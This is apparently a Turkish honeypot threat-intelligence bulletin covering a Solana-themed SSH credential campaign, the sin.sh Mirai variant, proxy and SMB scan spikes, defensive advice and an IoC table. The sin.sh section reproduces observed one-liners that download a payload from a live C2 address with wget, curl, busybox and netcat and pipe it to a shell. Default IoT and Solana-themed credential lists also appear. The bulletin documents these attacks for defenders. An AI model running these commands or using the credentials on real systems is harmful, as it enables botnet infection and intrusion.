Solana Avcıları, Mirai Mutasyonu ve Proxy Patlaması — 10–11 Nisan Sahadan Notlar
DNS fırtınası yatışırken yeni cepheler açıldı. Solana validator'larını hedefleyen credential kampanyası genişliyor, sin.sh Mirai varyantı 15 farklı yöntemle yayılıyor, port 3128 ve 139'da anomali spike tespit edildi. 7.85 milyon event, 21.917 benzersiz saldırgan.
Özet
Son bültende DNS amplification kampanyasının zirveyi geçip düşüşe geçtiğini, Endonezya kümelenmesinin yükseldiğini ve Cowrie’deki Solana credential’larının devam ettiğini raporlamıştık. 24 saat sonra DNS kampanyası gerçekten yavaşladı — ama boşluğu doldurmaya çalışan yeni aktörler sahneye çıktı.
Bu yazıda üç gelişmeyi derinlemesine inceliyoruz:
- Solana validator’larını hedefleyen organize credential kampanyası
- sin.sh Mirai varyantı ve aktif C2 altyapısı
- Port 3128 (Squid proxy) ve 139 (SMB/NetBIOS) anomali spike’ları
Günlük Trend — DNS Yavaşlıyor, Gürültü Değişiyor
| Tarih | Event | Değişim |
|---|---|---|
| 5 Nisan | 70.928 | — (başlangıç) |
| 6 Nisan | 443.426 | +525% |
| 7 Nisan | 1.283.086 | +189% |
| 8 Nisan | 2.133.808 | +66% (zirve) |
| 9 Nisan | 1.881.865 | −12% |
| 10 Nisan | 1.718.014 | −9% |
| 11 Nisan* | 325.020 | — (kısmi, ~10:00 UTC) |
11 Nisan verisi kısmi. Tam gün projeksiyonu ~780K — zirvenin üçte biri.
DNS amplification kampanyası hâlâ toplam trafiğin %87’sini oluşturuyor (6.84M event, port 53) ama mutlak hacim 8 Nisan zirvesinden sürekli düşüyor. Bu düşüş sahneyi temizliyor ve alttaki kampanyaları görünür kılıyor.
1. Solana Avcıları — Kripto Validator Altyapısını Hedefleyen Kampanya
Ne Görüyoruz
Cowrie honeypot’umuza gelen SSH brute-force denemelerinde standart root/admin/test üçlüsünün yanında dikkat çekici bir pattern belirdi: kripto ekosistemi terminolojisiyle uyumlu kullanıcı adları.
| Username | Deneme | Sıralama | Not |
|---|---|---|---|
sol | 67 | #5 | Solana kısaltması |
solana | 40 | #12 | Doğrudan hedef |
solv | 26 | #20 | SolV staking protokolü |
steam | 48 | #9 | Gaming sunucu (karşılaştırma) |
deploy | 33 | #17 | DevOps hedefleme |
claude | 18 | #25 | AI asistan adı — yeni trend |
Bu kullanıcı adları standart brute-force sözlüklerinde bulunmuyor. Birisi Solana validator ve RPC node operatörlerinin kullanma ihtimali yüksek olan kullanıcı adlarını özellikle hedefliyor.
Credential Kombinasyonları
Spray analizi Solana temalı şifreleri doğruluyor:
| Şifre | Deneme | Hedef Kullanıcılar |
|---|---|---|
solana | 35 | solana, ubuntu, root, jito, node, sol, validator, postgres, ubnt |
sol | 14 | root, sol, solv + diğer |
1234 | 27 | sol, kafka, vpn, ansible, solana, solv + diğer |
jito ve validator doğrudan Solana ekosistemi terimleri. ubnt (Ubiquiti) ise validator’ların edge router’ını hedef alıyor olabilir.
Kaynak Profili
Solana credential’larını kullanan 10 benzersiz IP tespit ettik:
| IP | Deneme | Blok |
|---|---|---|
| 193.32.162.145 | 48 | 193.32.162.x |
| 80.94.92.182 | 24 | 80.94.92.x |
| 2.57.122.238 | 20 | 2.57.122.x |
| 92.118.39.56 | 18 | 92.118.39.x |
| 2.57.122.210 | 14 | 2.57.122.x |
| 92.118.39.76 | 10 | 92.118.39.x |
Dört /24 blok: 193.32.162.x, 80.94.92.x, 2.57.122.x, 92.118.39.x. Bunların tamamı bilinen tarama altyapısı — VPS/hosting sağlayıcıları üzerinde kiralık sunucular. Kampanya düşük hacimli ama hedefli: genel brute-force’un aksine belirli bir yazılım ekosistemine odaklanıyor.
Solana validator'ları genellikle yüksek performanslı bare-metal sunucularda çalışır ve operatörler kolaylık için sol veya solana gibi kullanıcı adları oluşturabilir. Bir validator sunucusuna erişim = stake edilen SOL token'larına erişim. Mart 2026'da Solana ağında ~400M USD stake ediliyor. Bu kampanya finansal motivasyonlu ve hedefli.
”claude” — AI Asistan Adları Sözlüklerde
18 denemeyle claude kullanıcı adı Cowrie loglarında belirdi. Bu, AI asistanlarının (Claude, Copilot, ChatGPT) geliştirici sunucularında servis hesabı olarak kullanılmaya başlamasını yansıtıyor. Botnet operatörleri sözlüklerini güncelliyor.
2. sin.sh — Mirai’nin Yeni Yüzü
C2 Altyapısı
Tek bir C2 sunucusu tüm operasyonu yönetiyor:
C2: 196.251.107.133
Payload: /bins/sin.sh
Referans: 136 (7 gün)
Aktif Mirai IP'ler: 26+ (lider: 45.205.1.8)İkinci bir C2 (103.56.149.224) daha düşük hacimle aktif: /cacti/oto, /cacti/ns1.jpg, /cacti/ns3.jpg — Cacti NMS exploit’i üzerinden dağıtım.
15 Farklı İndirme Yöntemi
sin.sh kampanyasının dikkat çekici yanı yayılma çeşitliliği. Aynı payload için 15 farklı indirme komutu tespit ettik:
# Doğrudan
wget -qO- http://196.251.107.133/bins/sin.sh | sh
# Busybox fallback
busybox wget -T 9 -qO- http://196.251.107.133/bins/sin.sh | sh
# Curl alternatifi
curl -fsSL -o .s http://196.251.107.133/bins/sin.sh; sh .s
# Netcat
nc 196.251.107.133 3345 > .s; sh .s
# Dosyaya yazıp çalıştırma
wget -O .s http://196.251.107.133/bins/sin.sh; chmod 777 .s; sh .sHer komut aynı dizin zincirine sahip: cd /tmp || cd /var/tmp || cd /dev/shm — yazılabilir dizin bulana kadar dene. Bu, IoT cihazlarında read-only root filesystem’lere karşı geliştirilen klasik Mirai adaptasyonu.
Malware Sample Profili
Kampanyayla ilişkili 17+ benzersiz SHA256 hash tespit ettik. Tamamı aynı 3 kaynak IP’den dağıtılıyor:
101.47.159.50185.221.21.745.172.152.74
Her hash ~220 kez görüldü — bu, aynı binary’nin farklı mimariler için cross-compile edildiğini gösteriyor (ARM, MIPS, x86, x86_64, PowerPC — standart Mirai multi-arch dağıtımı).
Mirai Credential Sözlüğü
| Username | Deneme | Password | Deneme |
|---|---|---|---|
| root | 39 | 123456 | 86 |
| admin | 15 | admin | 29 |
| operator | 12 | root | 21 |
| solv | 7 | password | 19 |
| sol | 5 | vizxv | 8 |
vizxv — Dahua DVR varsayılan şifresi. Orijinal Mirai sözlüğünden kalma. operator/112233 çifti de Hikvision varsayılanı. Botnet IoT cihaz varsayılanlarını hâlâ aktif olarak tarıyor.
C2 sunucusu (196.251.107.133) yazı yazıldığı sırada hâlâ aktif. Port 3345 üzerinden netcat reverse shell kabul ediyor. Payload multi-arch, indirme yöntemleri çeşitli. Varsayılan şifreli IoT cihazları doğrudan risk altında.
3. Anomali Spike’ları — Proxy ve SMB
Port 3128: Squid Proxy Taraması
Trend verisinde port 3128 (Squid HTTP proxy) sıfırdan 650 event’e çıktı — %999+ spike.
Bu, açık proxy sunucularını arayan otomatik tarama kampanyası. Motivasyon: anonim trafik yönlendirme, credential stuffing proxy altyapısı veya C2 trafiğini gizleme. Proxy Avcıları yazımızdaki SOCKS 1080 kampanyasıyla aynı motivasyon, farklı protokol.
Niyet analizi proxy taramasını doğruluyor — 167.94.146.58 (Censys), 185.67.34.140, 194.88.98.82, 20.65.192.33 (Microsoft) gibi IP’ler port 3128’i sistematik tarıyor.
Port 139: SMB/NetBIOS Keşfi
Port 139 da sıfırdan 391 event’e spike yaptı. Port 445 (SMB) zaten DoublePulsar kampanyasıyla 21.281 event’te sabitken, 139’un ayrıca yükselmesi eski Windows sistemlerini (NetBIOS over TCP) hedefleyen ayrı bir keşif dalgasını işaret ediyor.
Niyet analizinde 115.201.242.213 ve 110.137.131.56 IP’leri yalnızca 139+445 portlarını tarıyor — ransomware-recon olarak sınıflandırıldı.
4. Ransomware Keşif Operasyonu
Niyet analizi bir IP’yi özellikle bayrakladı:
3.142.219.55 (AWS, US) — tek IP’den 20 farklı port taraması:
21, 22, 80, 110, 135, 139, 143, 443, 445, 993,
1433, 2375, 3306, 3389, 5432, 5900, 5985, 6379, 8080, 10250Bu port kombinasyonu üç niyet katmanını ortaya koyuyor:
| Niyet | Eşleşen Portlar | Severity |
|---|---|---|
| Ransomware recon | 135, 139, 445, 3389, 5985 | Critical |
| Data theft | 1433, 3306, 5432, 6379 | High |
| Crypto miner | 2375, 6379, 8080 | High |
SMB (445) + RDP (3389) + WinRM (5985) üçlüsü klasik ransomware lateral movement yolu. Aynı taramada veritabanları (MSSQL, MySQL, PostgreSQL, Redis) ve Docker API (2375) + Kubelet (10250) de var. Bu bir “her şeyi dene” taraması değil — bu, ne istediğini bilen bir aktörün altyapı haritası çıkarması.
AWS IP'den gelen bu tarama profili, initial access broker davranışıyla uyumlu. Hedef: erişilebilir Windows sunucuları (RDP+SMB+WinRM), veritabanları ve container orchestration. Erişim bilgisi ransomware gruplarına satılabilir veya doğrudan kullanılabilir.
5. 345gs5662d34 Enigması
Cowrie’deki en ilginç pattern: 345gs5662d34 stringi hem kullanıcı adı (204 deneme, #3) hem şifre (204 deneme, #1) olarak kullanılıyor. Varyantı 3245gs5662d34 de şifre olarak 202 kez denendi.
Bu, bilinen bir Mirai varyantı credential’ı. Orijinal Mirai kaynak kodundaki XOR-encoded sözlükte bulunmayan bu string, 2023 sonrasındaki Mirai fork’larında ortaya çıktı. 88 benzersiz IP’den spray ediliyor — bu da string’in birden fazla botnet operatörünün ortak sözlüğüne girdiğini gösteriyor.
Spray hedefleri: root, ubuntu, ftpuser, ali, test, user, oracle, pankaj, postgres — geniş hedef yelpazesi, belirli bir sistemle sınırlı değil.
6. SSH Client Parmak İzleri — Kim Gerçek, Kim Bot
| SSH Client | Deneme | Oran | Analiz |
|---|---|---|---|
SSH-2.0-libssh_0.11.1 | 2.575 | %73 | Otomasyon kütüphanesi, botnet favori |
SSH-2.0-Go | 378 | %11 | Go-based scanner (zgrab, masscan-go) |
SSH-2.0-libssh2_1.4.3 | 285 | %8 | Eski libssh2, muhtemelen embedded |
SSH-2.0-OpenSSH_7.4 | 213 | %6 | Gerçek OpenSSH ama eski (CentOS 7 era) |
SSH-2.0-OpenSSH_10.2 | 16 | %0.5 | Güncel OpenSSH — nadir |
%73’ü libssh_0.11.1 — bu, Cowrie’ye bağlanan “kullanıcıların” ezici çoğunluğunun insan değil, otomasyon aracı olduğunu doğruluyor. Go-based scanner’lar da eklendiğinde %92’si bot trafiği. Gerçek OpenSSH oranı %6.5.
7. Koordineli Kampanyalar
API’deki kampanya tespiti, aynı /24 alt ağından 3+ IP ile koordineli saldırı tespit ediyor:
| Subnet | IP Sayısı | Event | Severity |
|---|---|---|---|
| 45.187.59.0/24 | 52 | 9.598 | High |
| 205.210.31.0/24 | 12 | 140 | High |
| 147.185.132.0/24 | 11 | 112 | High |
| 45.205.1.0/24 | 3 | 987 | Low |
| 185.67.34.0/24 | 3 | 218 | Low |
| 194.88.98.0/24 | 5 | 41 | Medium |
45.187.59.0/24 açık ara lider: tek /24 bloktan 52 farklı IP, 9.598 event. Bu yoğunluk, bloğun tamamının tarama altyapısına ayrıldığını gösteriyor — muhtemelen bulletproof hosting veya kompromize edilmiş bir hosting müşterisi.
TR Radar
| IP | Hit | Sağlayıcı | Tip |
|---|---|---|---|
| 159.146.55.217 | 20.760 | — | ISP |
| 146.19.208.104 | 18.521 | BNET BULUT | VPS |
| 146.19.208.105 | 17.759 | BNET BULUT | VPS |
| 45.141.150.180 | 3.670 | Hostlayıcı | VPS |
| 88.247.8.10 | 2.778 | Türk Telekom | Ev/Ofis |
| 141.98.50.141 | 2.558 | Avrupa VPS | VPS |
| 89.252.188.142 | 213 | — | — |
| 83.150.215.50 | 103 | — | — |
Toplam TR: 66.879 event, 20 benzersiz IP. BNET BULUT ikili (%54) ve 159.146.55.217 dahil ilk üçlü %85. TTNet ev kullanıcısı 88.247.8.10 hitlerini 1.463’ten 2.778’e çıkardı — bu cihaz aktif olarak botnet’e dahil ve sahası habersiz.
Detaylı TR analizi: TR Radar #2
Suricata İmza Değişimleri
| İmza | Toplam | Önceki Bültene Göre |
|---|---|---|
| DNS Amplification Inbound | 5.391 | ↑ (kümülatif artış) |
| SSH Scan | 3.733 | ↑ +577 |
| NMAP -sS window 1024 | 2.667 | ↑ +500 |
| /etc/passwd in URI | 1.531 | ↑ +16 |
| MySQL 3306 Inbound | 1.174 | 🆕 top 15’e girdi |
| MSSQL 1433 Inbound | 1.030 | 🆕 top 20’ye girdi |
| PostgreSQL 5432 Inbound | 666 | 🆕 ilk kez görünür |
| HTTP CONNECT Off-Port | 616 | 🆕 proxy tarama göstergesi |
Veritabanı port taramaları (MySQL, MSSQL, PostgreSQL) ilk kez imza listesinde görünür seviyeye çıktı. Ransomware keşif operasyonuyla korelasyon: aynı aktörler veritabanlarını haritalıyor.
Savunma Önerileri
SSH kullanıcı adlarını sol, solana, solv gibi tahmin edilebilir isimlerden değiştirin. SSH key-only authentication zorunlu kılın. Validator sunucusuna yalnızca VPN üzerinden erişim verin. Fail2ban'ı aktif edin.
DVR, IP kamera ve router'larda varsayılan şifreleri mutlaka değiştirin. vizxv (Dahua), admin/admin (genel), operator/112233 (Hikvision) hâlâ aktif olarak taranıyor. Cihazları doğrudan internete açmayın.
Port 3128 (Squid), 2375 (Docker API), 6379 (Redis), 9200 (Elasticsearch) dışarıdan erişime kapalı olmalı. Veritabanı portları (3306, 1433, 5432) firewall arkasında tutun. SMB portları (139, 445) internete asla açık olmamalı.
C2 IP'lerini (196.251.107.133, 103.56.149.224) firewall'da bloklayın. Outbound bağlantıları izleyin — sin.sh payload'u wget/curl/busybox/nc ile indiriliyor. /tmp, /var/tmp, /dev/shm dizinlerinde çalıştırılabilir dosya oluşumunu izleyin.
IoC Tablosu
| Tip | Değer | Güven | Bağlam |
|---|---|---|---|
| C2 | 196.251.107.133 | Yüksek | sin.sh Mirai, port 3345 reverse shell |
| C2 | 103.56.149.224 | Yüksek | Cacti exploit dağıtım |
| URL | http://196.251.107.133/bins/sin.sh | Yüksek | Mirai dropper |
| Credential | 345gs5662d34 / 3245gs5662d34 | Yüksek | Mirai varyant sözlüğü |
| IP | 3.142.219.55 | Orta | Ransomware recon, 20 port scan |
| IP | 45.205.1.8 | Yüksek | Mirai spreader, 26 event |
| Subnet | 45.187.59.0/24 | Yüksek | Koordineli kampanya, 52 IP |
| IP | 216.82.43.156 | Yüksek | DoublePulsar exploit, 6.503 event |
| SSH Client | SSH-2.0-libssh_0.11.1 | Bilgi | Botnet SSH client imzası |
Kampanya Durumları
| Kampanya | Durum | Toplam Event | Trend | Referans |
|---|---|---|---|---|
| DNS Amplification (port 53) | 🟡 Decline | 6.84M | ↘ Yavaşlıyor | Bülten |
| SOCKS Proxy (port 1080) | 🟡 Devam | 193K | → Sabit | Deep-dive |
| Squid Proxy (port 3128) | 🔴 Yeni | 650 | ↗ Spike | Bu yazı |
| VNC Brute (port 5900) | 🟡 Devam | 79K | → Sabit | Deep-dive |
| sin.sh Mirai | 🔴 Aktif | 136 ref | → Aktif C2 | Bu yazı |
| Solana Credential | 🟡 Devam | 148 | → Sabit, hedefli | Bu yazı |
| DoublePulsar | 🟡 Devam | 7.9K | → Sabit | Önceki bültenler |
| SMB/NetBIOS (port 139) | 🔴 Yeni | 391 | ↗ Spike | Bu yazı |
| Ransomware Recon | 🔴 Yeni | 105 | Tek aktör | Bu yazı |
| DB Taraması (3306/1433/5432) | 🟡 Yükselen | 4.4K+ | ↗ İlk kez top 20 | Bu yazı |
Metodoloji
Veriler SiberKale Tellal gözlemevi T-Pot kurulumundan OPSEC-filtreli extractor aracılığıyla ve api.tellal.net FastAPI endpoint’lerinden çekilmiştir. Dahili IP’ler, sensör konumları ve pasif parmak izi verileri dışlanmıştır. SSH client parmak izleri Cowrie loglarından, niyet analizi port-intent mapping’den, kampanya tespiti /24 subnet korelasyonundan üretilmiştir.
Lisans: CC BY 4.0 — Atıf yapılarak serbestçe kullanılabilir.
SiberKale Tellal — Threat Intelligence Feed · tellal.net